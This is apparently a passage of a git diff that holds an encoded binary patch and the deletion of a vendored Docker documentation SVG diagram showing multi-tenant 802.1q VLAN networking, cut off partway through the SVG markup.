zb>rEFp@zUGz?aO1<wi}bI!MMtwb6Wg`}J_8Ql1Cp#X;80gQw*{G;D^pMvgm_g%)c&
z302kAz`Sv;V+!_{duj4ik+~r-X&NFhhQl5Dm9zY_U@qv{zuLu5(e5w%vu*q1>V9cg
zUQ<9y0QWk|6g3&X#u-3#Q6+3YbxzWQ4Ypf`Hc&YieLT8y*|r}!5T0qtpq1Oc+OD4C
ziyrZ5{q-B}`y>Zb62pg))goLh&hEpb72S9zFOnb6KRi8D{r<8C1+?2<DT%nzRLm#;
zAqzbA^7Kri!LhV3%iBvW8_6jdcsNwp=}P*QLk!=~<Fl{~1XZ<dr0X`i<j^DS<c0%V
zjWdRl-QL%?eR#A3kFhpJrOsui%UBVfU(kwvAB85QiPtWZ6Q>7}e0s3aI$1Q*m6Z`|
z$9mVvQ^)P17IbJq=TXIen<kc#b?R)jdS7w$&N_dh+_dFpdzOm>tF%@*UeafK^jUZM
zY%xzfxFw$W;#g%ScC@RLJViv{{DLp_=ziV&AZ?_bDw%!_85R^+K&$c+cC`b7;gf^!
zdkf+K++yzA!7U(VlTN^zS(Dh!w$apvnxHq?H_9PLvkrmBv6taxYGR@0E&bY$Jxn`^
z=%9sJCCM_P>1ycq+bfLYH{4p6!&4Tkb*@^gP_cSk(^iE<pR`{O6|6)aF|geh$<Mtt
z(-#o8$xV8tJkt)&fUPHF&ZK`Lv`e4;MlD~F>z7E+LhakO54^8zbDujJO_*>BO_v$z
zj4LH+Ds`DR|4;;TMfm!oSDjZ-&`<v2(z)H~YLkTyS7l<=gESDL>LOgx+g|WEv+_0b
z`B9yb=ef5Ik~F%XVxI9y;y5N!Nll=ggAuL{8xrbj76_0td5R|R>l;2Cfzn=3!d;Tg
zH0#m>fYa6$rzGjzU3HJ%hU1Bn!%yO6*k-7#&+0A@tKgsc{ck9_A!uFh7yJE-kH^XH
zthZn0>y9|4+em&Hl=vTnhm_+q(-x^$JEaDWqgv>riK>>G`411%0U!7Q<kBTr`acpG
z;6M8fVDSO)_p~+a+@ZJT!uJ%Zi;r{Ld6$clAK`CrW*4<Q3cPS_ntGtL+q%|UpPRl_
zt)&Nz`ZM3A1&ILRJ@@L<me7_M>NTNZop)^vXVh`0e*yCO;tD%bx59ow#0oplpi`6f
zY~gW~ldgiAr6oZJSpww3S40G^TrRSUENHG~msvj@=<sAdIzzv>;JJ-b1j`ZSji?Ee
zLTl2nAyhWMHZ3iUzksZ{!}?{2zVfqu5>Y~5@~9WF(^_a;b~E&z=QvCjw|5WNejE?;
z{%reMvCHi`dto8d?R}82^=I3&WL#s(LB292YEg%0BERP|DVnt?s>gftiWB$s=Nbvd
z=SUbyI<#ttj~x{S{u2T!Q2RFLG*^wk1i9**7zqh7h@5Gl>9xo#|6N~n$3bb;6VgFN
zUzJ8^$nWgB*Ikyg?flq8)>h{1cvk?-rpolPY!0(GM!SOzXP)Y2)R$YiF3cd026Zgt
zC$-2(vYvx-rJwe<ujC@c1B{te2s{Bgk*TApl#?fmFZ0uW%FkG$c$}PtH&|netFZxv
z`@-OUqKZcBdGF1-3aiob-FGyBZQKjlIZ9G9^2rV)Ol0^!b-oU#@|o|8+=RL0_q2=Y
zkJ=pxBaND`!nB5#Y4fq*5ASHr;nM)xAj{WDWo}UE@P>v4#x<gO@635{6?|{%ChPed
zj#}mXM@+{-B5&ty(+^STK8(k>y9N*bz{jirO3CfZV~CgeytlXU)Ef;V1Vt6J?s=q7
z=djU<1Y;vHrhH(A>JE~{)8;^F*eLe7O7b%gL#p|Ep;tpwO&~;P>{6;M#4_XfS--bT
zEYZIdr}5mCRMMM&O}DlQ6Ni^>a7I$R%&KRyH7)Pr_G{OY?<N|b*Yn(+oH04KQ_<_6
zn5kVe#%KiIGKC6xIU@J-A&W}8d?<bs-{Rm)NSW}6Ui3@~SSn+_@mapwWHv%q)L69{
zW6tkFS1--8hCH}}y<!jOjk7!PF`%vL;R40Gd>5)>8+e3}RjDg&&Hhxi12ACsFKf`f
z7oYv-$yT{+T$4%p1=MQOd3No39a3SnDEYVOLS7{rc{wd@iSWE>-p@m$%r#o02ziO%
zxSH&+4z<duw10*jFW~;<@v_z^J7ha(1vWN~&f!Aumc13Ic1}e2N(*eK#hJ>!y~N?Q
zoNX(k9_6Cxns2M!L<l_Hloj-M(e)xL^zfiJi^bR_%(?o9D`(^<&bb<M<^q{q@jM@g
z^qzK6yU!yTcCI2gqxr^uEOZ{B{t%c4+W<H6x!qLqKLDy#H8pb&FXmG-cYQtqtd6;s
zf<RkJ=`(aq-w4fkl*T}-w*~*~mtMeLE^KRYoD(-sZ0bJUX#m?MswJBppA|HSg1sz%
ze0#-?xF=+&Y!D%WOX|WtaE#ugvR?9aNt{nzkH3c14l3McsO#jbaWb>>{r^m_I8Tcf
zb}|n5Q3iXZAGJYRPf|ojKYn^}?zDp~9{^7qdg++dm&hou72(25PwkVg{v+vvH1|(V
zZTY~N<{za>gyBEcYJXDDYhUqd5=9N`TIFpYkmjC}Wv0L1QF^n3MhFlZVwMZM8>jvG
zc8j=_#^<gP%cUpbTXi)~{RDER7s;HNSsnKeocdMF_^e&BWJ8II+$lsbcP*`=PRv+i
z-t79%hik!mm=?ei9g|Jp??RX`Mx=SnP%GjUi+SJ_g3@6wef+8l)ysu;n$oCpc?1^=
zr;!DZ%A6Ow$LE9sb>DgaDeevn1;A16ClmhZUAZw+BJO|7GvJ0_=j9@hPU0u26PbDX
zQwosiGyh(|WsVhbh7B7VSM#^2+bq^7=g9m=hABYDPgecGAu$(OENNcD;k)pY6W93}
z{o=)u5!DB6WD$7xgnuu7CS28A_MgzhT{@DDctf8{@&8fwUBv4B?w2@UQwv)(U58s+
z>L-e-FMaZbnb<Zr9L!KLBSQOW>5scP*iU^!5_+F|`*or!y+O<p9^4K|6wpy_`zpE7
z>+GPRrl6W9d9hq!*i@F(^6WPi+`|1oe#XHM#V8H?3VEHJp-9MA2BWM&*oupsHc!G$
zIl7T+C&KU#W><18`npZ12wP^0?we&E%f*<E=6=j!TJR%LV4D`#BTL)m52hIPwp*Qd
zm&yeRLU&<WiU@PM^ye999_(eVE^2Qs%&T1PRz2rZp*S|_dA)r9-21dG41ZYMclc*q
zPHZ#Sq}3CBTpI#{&!j_c@(d$KtC%B=D`|$xb2jZm<<z|cJ=Rx6PITZ6H7AaPW&XC<
z_Me4><#SDY9E*M>ei&)MOq5yfCnX@Y`f~9Nw$Hcb<?d}3lc{CGDW$WOj(kz?jS%?T
z5D7b?HzP!-dvq}&W%!vyM=LwRt9uQ8l;Uyl_uSa!H!B6$6uy~Vg$SqAqp_QZ!lPuk
zfNoR%K$*YejOFi>W(91%)zevdoylqjmA@%P2At{~42)X&EiW?+*+-4v4Ycp!@dWvw
zDgBqLm`<rhYHSZ0b@ycvG@YEC<x4h%adOKFSK3GZV$A_Rc?YT;zHHIIu`|@<at%h%
z^y)p!e<*bBYtLde*4oh3WD$K>+2=~Fdb&CFawyt!AknMLEA8XK%Aupv%7<ebFH(<I
zbxO5axt~RU<u&(Fw(a~*_s_ZSU_#Vg%vJvq^IvRP3C9;Ni}YMF8{R(L-xz($_}Kz7
z(wqr!)01r4e}yP@+;dd-!$*+F-P!g%;b<*53<KC^O+5Q-J4dELq<<WEHDfq*Ncj4w
zT}vL}+D(ISpMH<)X<qX{yo|&K0R|h_B(0c-yDbc#iCDK1w12@nn}vU*qyA$h=R8*T
z^QZFOdI~M+vZFHKo33TNF9@EFV}EES*!)-~_{y8H^UtF}XkB7s0<E>KBaJv3dUU~F
zDnhkLRK0fs$mi3UOTj*Aqy7ON6&X^UKXq(73j#;3Um*(6a7w=Eb&`O@KbAb|FG5l5
z@1^u!`!0@ondd;Z;zY&k>0abQ{OZ~A%;vBnGk7d#l4-^k?+a$ESC=ES;2A|LIw+sG
zov|H??43x6y?*(tHMoJ0&o49co4MN#Rz<e8YQ*vYJ8DEb;nDv}&)crMy+qqI2@B9@
z_WP+X;-8FB#gr@?pNk7uen7PHg4*P$0_z&#t3O8kcD`yE1z;f(@Pq1em+>_Y6vX6e
z-(5!8HguEgP@N24RWa6d`e#;0fe(FSLq%B<J0npg3(-1|oj)VN?2f6xsnoFjCBVFS
zo;Or&vm?+h{rY?FSC?b@of({oi}uUwe;H@Ezv{0bhFe0-k!Yxv$j9S4n$AwU2gm?f
z+k{gQ4Dfrd`tE)_jonarc*^cXneL((aIuYM$7J=N!?Ioe3W~P=z8|R`=cm<L0e52w
z@gv7*zMHKUgtba#wjT2zb>x^b6%W3e2L;B^-)861&F4|)pMSa)fA5d%70C71M6))P
z@6i^+GmhDfM`)-_;NQtQtm#tp>BTTUxJM5ND88t#K~=eB4*1M?e{-tjjU*7!-i@fI
z1OK@F9K%`!K$E_XgkzH6ncXhYx+T$6AO;}g<C<UVj>M<%e&Bg)$WXxf1q8@o*ynQp
zYOfb;D0%56T7))UhDk!_V{bZDXuC|Hatfm5`Sk|heaUkQ4+GhwK!Ady$P(q>(9pkb
zXk=u>^>o|eHA?VUb+Q?^S-X9b&=9V~`K1fl4;eWigu`zNPn6y5&tIe;*}Ov(ut@TM
zQG6T}*(ppat0YdXMG1(TCjEyY5rKi}HS#1o;&8mf4~Y}wxFj4D1pp`?RzP^Q*`u1^
z+7CH=y)dE^(W%v>rJTa3etdjF^$1sc`vS!2@rb?<RVRzd`0>P}6)hsEi*@mn$*rsZ
z*JfPQrK6anuKW4(vrA?lGMd2=a|$k6h-LJAAtTMlC75cSiZj&6P7!sI%c0aCFCn&_
zaw0M}v%sR}WI`hFLD>DRdboJN4l-IZz@+>2#LXSmU)?JFXaW!aQqmm<)w~WAnW$&8
zO06QprL)YG)PHgvYRjT^Cx2nrbs!rfMl1Wtp(E@8wGf-nc%bO#NzDYpej0D?x4Vl5
z>m<B*$*#;{Ep$cZ6A?e0F5ga^eS>)%{(S?aP5eP~xF_48ah}6gc{lcH2I-?<dfSkV
zSMBikh`Owphd;M69D6*#WkZo~rY>jlkMGVt+md@3Yx}V)kSbG6R&v++l4&6SN}?GZ
zRdZTx5P5hf?(j7jkpe_LZf8E*#8~F#!JL+s`~$ggf;}>kXtlZ;G5`Fg%3Njq=b<&l
zU>uvr=7(hE?<{hSeL-8xBbhI9>Yytcel^R1t$?rf&cX~r`L^i=o=O^IOom_Dd{qUJ
zail2X-MQHDJkJBL`vp2MOTG)`p?pgp>l(&y%MI_{_LSQNCk`w3YSyDK0DjbJ@_kjH
z;~sf4NKJJ26B_xmzpX--4KG(+W{l;!bSMkmne469Ugk|SEIl8^SpJSU<M1Es0a(BN
zZ_D~2#@BtFX^YjV<=}?`2#9B&ObVw$8tK(X4YXy+YpfjJwtnxQcmO0igBO=W%CX;3
zl7y8<LRO+{pQMdKSc2_38gH?;KGf`+4h>@$a*kq(bN30OYWo%wjL35S$m2|v-vCEV
z9;fQiEDv%U61L=z%FBOS5sN7^W_wf@xm}`e6~Qx(V3xYgj5KlI_KNU67`+1Y1GMbU
zJCM?69K(%tleG#o%!G9113xSRR8o@6+FDyr)PDtYxdf^ND7r|>3+m2t;eOlHAbwrs
zbw8)tp{`?#N>Hy>Vw#I7(z02B0<w%%MR&<u=Px{*?)XSOZrq-1)`gu_GJkyJ8B@mk
zW*pp7a7}m#<$<B`d34u!YElO8HT9Wfv*!6MrYI4d)}UB@9X_;E)qGmYV_%w_oHV!7
zZwDPcDkz-Li;ccek?m4)DAzMr`MC({zrAnlpHM(iffp3JmS1wk*^NMFaGqkrk$JA!
z3pog`p||#7n4upwSZX9`&faerXJE&i;#5MWSo6%vFZtqmh)b$jczV7EOsRT!@GZ_F
z$pwDkBMDGovM(g#3Jj6-$W=cZok|hs;Q%c8ryLlkigCPSs>x^N^}%SwYLlWp@+i|)
zatj!bQnjjCdTV?pg>rnxS44WT0OEQfm>^wgO2=?0i6_}Y_~e$TTEI%|SPD1@R>bq<
zg2`!ar%7_C%Kl<)qLZQSw{jsf^Jc+~V#S-%V{$ng&!1vV3q-tD?feCew$g(`diU5!
zW=HzyUb<kxyGO-|lb{xj_v>}&!#!sNpq;x+tBf*c`0eX-_G$KL-Wq=;r!YaE6?I+d
zJP4<l*AeM^lsj%JT%~tIF3@JiS!umjv6P-b9o#fapRuDiGix0<C46n=VBTWmd6!>v
zYwZ20rc)i-xvV)D@&Z76bEK3vf9%rU&<65}(H%_@)zH<-)#%-2Dn595eqv$TAnBkM
z^?WTC_!ofY$wQ{V_+6uP$VBR2BBM`Sg;4ED@K2Etf1mSu{D-HS(;C?LO{??a92!_V
z^fEQ&{q6@vX}el^h4NG4kf=6kDcv)sPjqb5d5K=xaT0#lv=c#($wC>ad^E@~Mm@Gg
z*#Dobs?9oLE`6UK;Mo!1-gn+^VhULP-@Na-+)QVz4a;9j(o@sY!kuLImJ|A44rgn`
zIu*tSH};M!Wk)1otS&LGhX;^ipQFMHRsVIpn(Nv(l(f-B@=!QB7Ef`Ftz2%qq+RF(
z?YerZIHz%hxh0M{&AUy=+ar(f#0%E`)axho@(%&|?>IU;FY$xcE`O<uQKa$+sVq)~
zzIJ*(E+j4W9*MkAHz4H!L({qG8&_6VR8pCDX}s788#K<PY&}ZF-Es+EuOD78E5!?6
z+||Ky_EXDFRZvV*TJJ^)_rD_hR5W6B$uY;pt(HJzjQq#a6Sv?jFLjudYC0!g9tC_w
z7b7-IBC#5IFYct5*@%XIG?Kewpga=Q+{572`o)$9P4tdC?*+Q_IvM?Ee;oJ6yQ^=*
zsTU+gCOo8JEk+!NhPH%6;o(TVr|D86j{LeNLf{O(fb*~7<?FmDb9Q~1(q*(ihY<}`
zvhphsu7b*4<NH(mMfemgZx?`5d2Sc!MACAAAphVkMhMIKALW|YL6Iv-Y%DA{e~a|*
zGkR$En_i3@+0FF_#xgh4(G=NX5uuC!iIYJ-mw)&p2h(N}>dt=|Q8V#;qCF^rc~|!;
z$03QC1fa!sN2;rnk3x_e@|#I(4czUYba3DZ(ZWR-w~yzV%!jn<PyDkDnR<~rV|9>S
zI=|~Z2r@9^K6cOV9SQpw{wF37N%lAT=kQO~$#=au6eB#p?KtpWTcCmd!iM34ElUM`
zT%NWTfA6=o639Q!#xt%X%4G|l@4IemhMEa^QItX%L_qY$Ma<64;qt#U2v=WU9$EjA
z9y*uPxeXDO#I3#AAZpSPWa_)nnPJ12t%$=BrW6EHBz%c#iB`PC#H;UpUmx|IqEa}R
z7rrqO^$_=QQo2H5f<Aq>_61(&4qg)TW+Ir<fhHTaanqYmDX{s2LhV;3fsZ@g<+qSQ
zWwZR~PpbL<dJC0z3JNH7P>nFGPhZ{~x<SPL$dzneyl{hR?~0$a_EF#$rpY<oZJlNZ
z8$nv<xTQzAo%Ey(K0yD!xtqls9Juk+E1{e{$@BHS_urLgynXvt1?c<kxbB#OkQ<GM
z-uK%pW*v#tpVnaP`ss+%D^J$`iF@oOzn)?Ss!LlQTZD*QFg&wc@$&p5?SBv2%@h2h
zwjOA8`sq7S?>4OK4gEcN(vBVXo1T=ck8fCUp6g%z?@m#P*^>KMXZd7=E>JyreSU^X
zm&dee)0)ofFnxNm&F9I#?R$;Wa-}&AZ>SGmSY7Xaa?bw=^DkUntS0V%@Z1ESqs_;8
zB%Kt!IXVxTp73@|usNa7{M#zezDcJxbX|GuADdvInV)}7{OoD<@}Bi=_79OW>$m?g
z`@eA2+2Y#lhUZV79p>-|Dl~EXVb}it@|S0quN(C$Xw0z|zW3|pzC7=e*S+%Ht15O}
z@PGbzli_EFo6LXr8F5J6UioSE_0JD~Z_+CHU^$2X`F*{(<?sKmSmm^ksr^n<Z0cK+
zl4IM<TJ=I68>@yrtv}nS5&!vBR_42NAzV-A%y8Q(dUenH`-^_q-7HNxz5MeY)8FOa
zr*FOXrR@Ixx_i}SR>BV~r~Y)<rM~jVv&S{_cfSi>K1J1J{=R9QKWpYm{_9*M9=UPf
z#iNJjFFzo6UDuJ@{{7O=r)w`>J9m0ZzP{XlyB||7|J(VuaDhQ-V3hUo-W%6agW2V_
zWJdk46ezQe-oO8ud;g7vb(?Rxn7;qL{e#Wx+}mI`=<ofT8a?~oyT|Q&)0Z1F&I_K!
zzp#2zSGwJ)?~x^Um-A(wUA{gw$!KOu{*K+dZ?gujy)I}ZzUos&P@SmmxrI^Dk0)LT
zx-m1c+f3bXzTD^eCqBQN!SA<|<Gaj0|I4%e<4@}d++}motqWfM$hu(SB4@n~g|)S7
zD|F5z%YEj|p4mTd>qZ5}=ncW#H{L8@?Uj_5D>q|nKA5%jk{U=wX7<eUmoHB)y=b*+
zVympo#u&Z!!-?P6{)X#_bsr7`sSteGdRB0&^3;W1YmOIuORiS$Kex10KFV3w)caSd
z+3cIA4f-q3{NEq-Y{|J-7pBNATo)f3tNAzVam}p8(0M#k5f}GeiAsr@wJ`0NT=_cL
zxggc<Yf~4#V2ZeGZS>;6)2FF{BBqTqj@vwYd~H*~w%fp*k;|sH>+@1|w*I$?a-V1P
zd+48%X}y>+<)EMxODP*S$b{vqQy*sV>MiBYSk->?!91O=^h+_kcTZn8ykpo_c_!IT
zX|G7RN!Ox^y1HxWv*+<xt-N;K>ip+-<y)cFGcf#T+sebx5XHvepv%mVCCR`*4);S`
b9iz+s-oKmmO1OaswlH|Q`njxgN@xNAR!440

diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg
deleted file mode 100644
index 5c6c6070a6..0000000000
--- a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg
+++ /dev/null
@@ -1 +0,0 @@
-<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="409" height="232.14285409109937"><style xmlns="http://www.w3.org/1999/xhtml"></style><defs><linearGradient id="RKkzpzQhZTCk" x1="0px" x2="0px" y1="100px" y2="-50px" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#3d85c6"/><stop offset="1" stop-color="#FFFFFF"/></linearGradient><linearGradient id="SeALyqvahCFZ" x1="0px" x2="0px" y1="100px" y2="-50px" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#3d85c6"/><stop offset="1" stop-color="#FFFFFF"/></linearGradient><linearGradient id="KIKSmddbxdCC" x1="0px" x2="0px" y1="100px" y2="-50px" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#3d85c6"/><stop offset="1" stop-color="#FFFFFF"/></linearGradient></defs><g transform="translate(0,0)"><g><rect fill="#ffffff" stroke="none" x="0" y="0" width="409" height="232.14285409109937"/></g><g transform="matrix(1,0,0,1,49.49612211422149,23.274999999999892)"><g transform="translate(0,0)"><g transform="translate(-118,-61.828333333333035) translate(68.50387788577851,38.55333333333314) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#ffe599" d="M 53.99612211422149 27.77500000000007 L 315.0022137987153 27.774999999999892" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,46.49612211422149,22.20833333333323)"><g transform="translate(0,0)"><g transform="translate(-115,-60.76166666666637) translate(68.50387788577851,38.55333333333314) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#e69138" d="M 50.99612211422149 26.708333333333407 L 312.0022137987153 26.70833333333323" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,46.49612211422149,20.074999999999903)"><g transform="translate(0,0)"><g transform="translate(-115,-58.628333333333046) translate(68.50387788577851,38.55333333333314) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#e06666" d="M 50.99612211422149 24.57500000000008 L 312.0022137987153 24.574999999999903" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,44.49612211422149,17.874999999999943)"><g transform="translate(0,0)"><g transform="translate(-113,-56.428333333333086) translate(68.50387788577851,38.55333333333314) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 48.99612211422149 22.37500000000012 L 310.0022137987153 22.374999999999943" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,44.49612211422149,24.574999999999847)"><g transform="translate(0,0)"><g transform="translate(-113,-61) translate(68.50387788577851,36.42500000000015) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 48.99612211422149 29.075000000000003 L 310.0022137987153 29.074999999999847" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,46,63)"><g transform="translate(0,0)"><g transform="translate(-64,-36) translate(18,-27) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#e69138" d="M 52 69 L 138 69 Q 148 69 148 79 L 148 112 Q 148 122 158 122 L 184 122" stroke-miterlimit="10" stroke-width="5"/></g></g></g></g><g transform="matrix(1,0,0,1,42,42)"><g transform="translate(0,0)"><g transform="translate(-190,-32) translate(148,-10) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#f1c232" d="M 48 48 L 234 48 Q 244 48 244 58 L 244 137 Q 244 147 254 147 L 277 147" stroke-miterlimit="10" stroke-width="5"/></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,133.38636363636374,108.14285409109937)"><g><g transform="translate(0,0) scale(1.7571428571428573,2.3636363636363638)"><g><g><g><path fill="#999999" stroke="rgb(0,0,0)" d="M 58.97 19.094 C 58.977 18.895 59 18.7 59 18.5 C 59 8.283 50.717 0 40.5 0 C 33.11 0 26.751 4.344 23.787 10.607 C 22.275 9.593 20.458 9 18.5 9 C 13.5 9 9.41 12.866 9.037 17.771 C 3.778 19.616 0 24.61 0 30.5 C 0 37.787 5.778 43.71 13 43.975 L 13 44 L 58 44 L 58 43.975 C 64.671 43.71 70 38.235 70 31.5 C 70 25.095 65.18 19.822 58.97 19.094 Z M 58 41.975 L 58 42 L 13 42 L 13 41.975 C 6.883 41.711 2 36.683 2 30.5 C 2 24.994 5.872 20.398 11.039 19.271 C 11.013 19.017 11 18.76 11 18.5 C 11 14.357 14.358 11 18.5 11 C 21.017 11 23.239 12.244 24.6 14.146 C 26.512 7.15 32.897 2 40.5 2 C 49.613 2 57 9.388 57 18.5 C 57 19.353 56.914 20.183 56.79 21 L 58 21 L 58 21.025 C 63.565 21.288 68 25.87 68 31.5 C 68 37.13 63.565 41.712 58 41.975 Z" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,46.65404609475037,143.99656534721677)"><g><g transform="translate(0,0) scale(0.44395492957746485,0.26378466557911767)"><g><path fill="url(#RKkzpzQhZTCk)" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.2524809014999616,3.790970933828097)"><path fill="none" stroke="none" d="M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z"/><path fill="url(#RKkzpzQhZTCk)" stroke="#6fa8dc" d="M 0 0 M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,50.53252582967698,139.4965653472169)"><g transform="translate(0,0)"><g transform="translate(-53.7573249679898,-143.64485245977795) translate(3.224799138312825,4.148287112561064) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 55.03252582967698 143.9965653472169 L 55.03252582967698 170.37503190512842" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,78.11478334058147,139.4965653472165)"><g transform="translate(0,0)"><g transform="translate(-83.50230524967998,-145.05170400953324) translate(5.38752190909851,5.55513866231675) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 82.61478334058147 143.9965653472165 L 82.61478334058147 170.37503190512865" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,64.35179257362361,139.49656534721677)"><g transform="translate(0,0)"><g transform="translate(-67.51992778489121,-145.05170400953324) translate(3.1681352112675967,5.555138662316466) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 68.85179257362361 143.99656534721677 L 68.85179257362361 170.37503190512854" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,17,177)"><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="28" fill-opacity="0"/></g></g><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g></g><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="1" y="12">container1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="12"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="68" y="12">vlan10</text></g><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="12" y="14" width="81" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="12" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="36" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="56" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="69" y="26">2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="76" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="79" y="26">24</text></g></g><g transform="matrix(1,0,0,1,70,90)"><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g/></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="74" y="-7" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="74" y="-7" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="1" height="14" fill-opacity="0"/></g></g></g><g transform="matrix(1,0,0,1,73,7)"><g transform="translate(3,0) matrix(1,0,0,1,0,0) translate(-3,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="106" height="19" fill-opacity="0"/></g></g><g transform="translate(3,0) matrix(1,0,0,1,0,0) translate(-3,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="106" height="14" fill-opacity="0"/></g></g><g transform="translate(3,0) matrix(1,0,0,1,0,0) translate(-3,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="3" y="0" width="102" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="3" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="26" y="12"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="37" y="12">802</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" 